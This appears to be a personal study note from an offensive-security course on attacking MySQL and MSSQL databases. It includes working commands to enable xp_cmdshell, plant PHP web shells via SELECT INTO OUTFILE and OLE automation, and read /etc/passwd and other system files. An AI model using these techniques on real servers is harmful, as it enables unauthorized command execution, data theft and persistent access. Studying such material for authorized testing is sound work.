:PROPERTIES:
:ID:       6aea86c1-1e85-431c-bebd-a8278de7919c
:END:
#+title: SQL
#+OPTIONS: toc:3 ^:{}

* TOC :toc_3:
- [[#attacking-sql-db][Attacking SQL DB]]
  - [[#enumeration][Enumeration]]
    - [[#banner-grabbing][Banner Grabbing]]
  - [[#authentication-mechanisms][Authentication Mechanisms]]
    - [[#misconfigurations][Misconfigurations]]
    - [[#privileges][Privileges]]
  - [[#protocol-specific-attacks][Protocol Specific Attacks]]
    - [[#connecting-to-sql-server][Connecting to SQL server]]
    - [[#default-dbs][Default DBs]]
  - [[#execute-commands][Execute Commands]]
    - [[#mssql][MSSQL]]
    - [[#mysql][MySQL]]
  - [[#write-local-files][Write Local Files]]
    - [[#mysql---write-local-file][MySQL - Write Local File]]
    - [[#mssql---write-local-files][MSSQL - Write Local Files]]
  - [[#read-local-files][Read Local Files]]
    - [[#mssql-1][MSSQL]]
    - [[#mysql-1][MySQL]]
  - [[#mssql-specifics][MSSQL Specifics]]
    - [[#capture-mssql-service-hash][Capture MSSQL Service Hash]]

* Attacking SQL DB
- [[https://www.trendmicro.com/vinfo/us/threat-encyclopedia/vulnerability/2383/mysql-database-authentication-bypass][MySQL DB Authentication Bypass]]
  - =Timing Attack=: mysql repeatedly attempts to auth to server * measures time taken for server to respond each time.
  - by measuring time, possible to determine when correct passw found, even if server doesnt tell
  - =5.6.x= took longer to respond to incorrect pass than to correct

** Enumeration
- MSSQL -> =TCP/1433=, =UDP/1434= (=TCP/2433= in *hidden* mode)
- MySQL -> =TCP/3306=
- default NSE scripts

*** Banner Grabbing
~nmap -Pn -sVC -p1433 <ip>~

** Authentication Mechanisms
**** Authentication Types
***** Windows Authentication Mode
- default
- =integrated= security (SQL server security model tightly integrated w Windows/AD)
- specific users & groups Re trusted to login to SQL server
- already authenticated users not needed to present additional creds
***** Mixed Mode
- supports auth by Win/AD accounts & SQL server
- Username & Pass pairs maintained w/in sql server
  
*** Misconfigurations
- anon access

*** Privileges

** Protocol Specific Attacks

*** Connecting to SQL server

**** MySQL
- ~mysql -u julio -pPassword123 -h 10.129.20.13~

**** Sqlcmd (mssql)
- ~C:\htb> sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30~
- ~-y~ (=SQLCMDMAXVARTYPEWIDTH=) & ~-Y~ (=SQLCMDMAXFIXEDTYPEWIDTH=) for better output

**** Sqsh (mssql linux)
- ~sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h~
- =-h=: disable headers

**** mssqlclient.py (impacket)
- ~mssqlclient.py -p 1433 <user>@<ip>~

*** Default DBs
- info about DB itself
- can use sys stored procedures
- dont store company data

****** MYSQL
******* mysql
+ system DB
+ contains tables that store info req by server
******* information_schema
+ DB metadata
******* performance_schema
+ monitoring MySQL server execution at low level
******* sys
+ set of objects -> helps to interpret data collected by =performance_schema=
****** MSSQL
******* master
+ keeps info for instance of SQL server
******* msdb
+ used by SQL server agent
******* model
+ template DB copied for each new DB
******* resource
+ *ro* DB
+ keeps sys objects visible in every DB on server in sys schema
******* tempdb
+ temp objects for SQL queries

** Execute Commands
*** MSSQL
- extended stored procedure -> =xp_cmdshell=
**** XP_CMDSHELL
- disabled by default
- toggled using =Policy-Based Management= or executing =sp_configure=
- windows process spawned by xp_cmdshell has same security rights as SQL server service account
- operates synchronously. control not returned to caller until cmd-shell cmd completed.
#+begin_src cmd
1> xp_cmdshell 'whoami'
2> GO

output
-----------------------------
no service\mssql$sqlexpress
NULL
(2 rows affected)
#+end_src

***** Enable XP_CMDSHELL using
#+begin_src cmd
-- To allow advanced options to be changed.  
EXECUTE sp_configure 'show advanced options', 1
GO

-- To update the currently configured value for advanced options.  
RECONFIGURE
GO  

-- To enable the feature.  
EXECUTE sp_configure 'xp_cmdshell', 1
GO  

-- To update the currently configured value for this feature.  
RECONFIGURE
GO
#+end_src

**** Other methods for cmd execution
- adding extended stored procedures
- CLR Assemblies
- SQL Server Agent Jobs
- external scripts
- =xp_regwrite= -> elevate priv by creating new entries in windows reg
*** MySQL
- =user defined fn()= -> exec C/C++ code as fn w/in sql
  
** Write Local Files
 - can achieve cmd execution on =mysql= if we write to location in file system that can exec cmds
 - =MySQL= operates on php based web server or =ASP.NET=.
 - if appropriate priv, can attempt to write file using ~SELECT INTO OUTFILE~

*** MySQL - Write Local File
- ~SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';~
- =secure_file_priv= limits effect of data import & export operations (~LOAD DATA~ & ~SELECT ... INTO OUTFILE~) & =LOAD_FILE()= fn()
- operations permitted only to users w =FILE= priv

**** Secure File Priv
- may be set as:
  - *empty*: var has no effect (not secure), can read or write data using mysql
  - *directory name*: server limits import & export ops to work only w/in that dir. dir must exist beforehand
  - *NULL*: disables all import/export
- ~show variables like "secure_file_priv"~

*** MSSQL - Write Local Files
**** Enable Ole Automationn Procedures
- requires admin privileges
#+begin_src cmd
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
#+end_src
**** Create File
#+begin_src cmd
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO
#+end_src
** Read Local Files
*** MSSQL
#+begin_src cmd
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO

BulkColumn

-----------------------------------------------------------------------------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to hostnames. Each
# entry should be kept on an individual line. The IP address should

(1 rows affected)
#+end_src
*** MySQL
#+begin_src mysql
mysql> select LOAD_FILE("/etc/passwd");

+--------------------------+
| LOAD_FILE("/etc/passwd")
+--------------------------------------------------+
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

<SNIP>
#+end_src
** MSSQL Specifics
*** Capture MSSQL Service Hash
- using =xp_subdirs= or =xp_dirtree= (undocuments stored procedures)
  - use SMB to retrieve list of child directories undner specified parent directory from FS.

